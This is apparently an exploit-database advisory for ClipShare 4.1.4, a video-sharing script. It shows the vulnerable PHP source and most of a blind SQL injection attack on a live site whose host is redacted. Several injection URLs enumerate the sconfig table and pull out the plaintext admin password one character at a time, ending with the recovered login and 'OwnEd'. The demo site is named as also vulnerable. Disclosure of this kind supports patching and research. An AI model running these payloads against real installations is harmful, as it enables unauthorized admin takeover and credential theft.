1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 |
===================================================================== Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4 Official site: http://www.clip-share.com Software License: Commercial. Vulns: Blind SQl injection && Plaintext Password. ====================================================================== AFAIK all versions is vulnerable: Official Demo is also vulnerable: http://www.clipsharedemo.com/ugroup_videos.php?urlkey=%27%20and%203=%273 Last Checked: 13 March 2013 NOTE:To exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini) Vulnerable Script: //ugroup_videos.php =========================== BEGIN OF ugroup_videos.php ============================================= <?php /************************************************************************************************** | Software Name: ClipShare - Video Sharing Community Script | Software Author: Clip-Share.Com / ScriptXperts.Com | Website: http://www.clip-share.com | E-mail : office@clip-share.com |************************************************************************************************** | This source file is subject to the ClipShare End-User License Agreement, available online at: | http://www.clip-share.com/video-sharing-script-eula.html | By using this software, you acknowledge having read this Agreement and agree to be bound thereby. |************************************************************************************************** | Copyright (c) 2006-2007 Clip-Share.com. All rights reserved. |**************************************************************************************************/ require('include/config.php'); require('include/function.php'); $urlkey= ( isset($_REQUEST['urlkey']) ) ? $_REQUEST['urlkey'] : NULL; $uid= ( isset($_REQUEST['UID']) && is_numeric($_REQUEST['UID']) ) ? $_REQUEST['UID'] : NULL; $sql="SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1"; $rs = $conn->Execute($sql); if($rs->recordcount()>0) { STemplate::assign('groupname',$rs->fields[gname]); //PAGING STARTS $page = ( isset($_REQUEST['page']) && is_numeric($_REQUEST['page']) ) ? $_REQUEST['page'] : NULL; $sql = "SELECT count(*) as total from group_mem WHERE GID='" .$rs->fields['GID']. "' limit 1"; $ars = $conn->Execute($sql); $total= ( $ars->fields['total']<=$config['total_per_ini'] ) ? $ars->fields['total'] : $config['total_per_ini']; $tpage = ceil($total/$config['items_per_page']); $spage= ( $tpage == 0 ) ? $tpage+1 : $tpage; $startfrom = ($page-1)*$config['items_per_page']; $sql= "SELECT m.*,s.addtime from group_mem as m,signup as s WHERE m.MID=s.UID and m.GID='".$rs->fields['GID']."' limit $startfrom, " .$config['items_per_page']; $rs= $conn->execute($sql); if($rs->recordcount()>0) $vdo = $rs->getrows(); $start_num= $startfrom+1; $end_num= $startfrom+$rs->recordcount(); $page_link= ''; $type= ( isset($_REQUEST['type']) && $_REQUEST['type'] != '' ) ? "&type=" .$_REQUEST['type'] : NULL; for ( $k=1;$k<=$tpage;$k++ ) $page_link.="<a href='https://www.exploit-db.com/exploits/24790/group_members.php?UID=" .$uid. "&page=" .$k. $type. "'>$k</a> "; //END PAGING } STemplate::assign('err',$err); STemplate::assign('msg',$msg); STemplate::assign('page',$page); STemplate::assign('start_num',$start_num); STemplate::assign('end_num',$end_num); STemplate::assign('page_link',$page_link); STemplate::assign('total',$total); STemplate::assign('answers',$vdo); STemplate::assign('head_bottom',"grouplinks.tpl"); STemplate::display('head1.tpl'); STemplate::display('err_msg.tpl'); STemplate::display('ugroup_members.tpl'); STemplate::display('footer.tpl'); STemplate::gzip_encode(); ?> ====================END OF ugroup_videos.php======================== Real exploitation example: _REMOVED_/ugroup_videos.php?urlkey=1' order by 14-- 3='3 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3 //ON TRUE //RETURNS: NORMAL PAGE http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3 //ON FALSE // RETURNS NOTHING.(White Page) http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=2,0,3))-- 3='3 Plaintext password: //siteadmin/login.php ============ BEGIN OF siteadmin/login.php =========================== <?php include('../include/config.php'); if ( isset($_POST['submit_login']) ) { $username = trim($_POST['username']); $password = trim($_POST['password']); if ( $username == '' or $password == '' ) { $err = 'Please provide a username and password!'; } else { $access = false; $sql= "SELECT soption FROM sconfig WHERE soption = 'admin_name' AND svalue = '" .mysql_real_escape_string($username). "'"; $conn->execute($sql); if ( $conn->Affected_Rows() == 1 ) { $sql = "SELECT soption FROM sconfig WHERE soption = 'admin_pass' AND svalue = '" .mysql_real_escape_string($password). "'"; $conn->execute($sql); if ( $conn->Affected_Rows() == 1 ) { $access = true; } } // SNIP // ============ END OF siteadmin/login.php =========================== //TRUE http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(<code>svalue</code>)!=0,0,3) from sconfig)-- 3='3 80 user: http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(<code>svalue</code>)=80,0,3) from sconfig)-- 3='3 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3 Passi cekirik: http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 11 simvolludur pass. ======================================================== 1-ci simvol:o http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 2-ci simvol:( http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 3-cu simvol: 2 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 4-cu simvol: n http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 5-ci simvol: @ http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 6-ci simvol: b http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 7-ci simvol:% (yoxla sonra) http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 8-ci simvol:h http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 9-cu simvol: a http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 10-cu simvol: 5 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 11-ci simvol: 1 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 //Parol duzdur tamamile ascii representasionu yoxlamaga ehtiyyac yoxdur.(plaintext oldugundan subhe yaradirdi) http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 pass: o(2n@b%ha51 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3 login: admin pass: o(2n@b%ha51 http://_REMOVED_/siteadmin/ OwnEd. Tested version: Tuesday, March 12, 2013 | Version: 4.1.4 | Username: admin | Logout Copyright © 2006-2008 ClipShare. All rights reserved. ========================================= KUDOSSSSSSS ========================================= packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us El sallayin :D ottoman38 & Ferid23 & Metaizm &HERO_AZE & BOT_25 &CAMOUFL4G3 4R!F * Orxan_204 && SEXAVET & Manifesto & J_OF_R & & etc. =========================================== /AkaStep |